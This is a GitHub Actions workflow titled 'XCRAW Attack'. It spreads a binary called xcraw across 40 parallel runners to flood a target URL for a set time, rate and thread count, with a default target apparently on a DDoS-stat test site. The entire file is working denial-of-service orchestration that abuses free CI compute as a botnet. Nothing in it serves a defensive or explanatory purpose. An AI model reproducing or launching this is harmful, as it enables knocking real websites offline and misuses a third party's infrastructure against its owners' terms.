name: XCRAW Attack

on:
  workflow_dispatch:
    inputs:
      url:
        required: true
        type: string
        default: "https://captcha.dstatbot.win/N3qWV8Ci"
      time:
        required: true
        type: number
        default: 300
      rate:
        required: true
        type: number
        default: 90
      threads:
        required: true
        type: number
        default: 1

jobs:
  xcraw-attack:
    runs-on: ubuntu-latest
    
    strategy:
      fail-fast: false
      matrix:
        shard: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40]
    
    steps:
      - uses: actions/checkout@v4
      
      - name: Make xcraw executable
        run: chmod +x xcraw
      
      - name: Run xcraw attack
        run: |
          echo "Running shard ${{ matrix.shard }}/40"
          ./xcraw "${{ inputs.url }}" "${{ inputs.time }}" "${{ inputs.rate }}" "${{ inputs.threads }}"
        timeout-minutes: 10
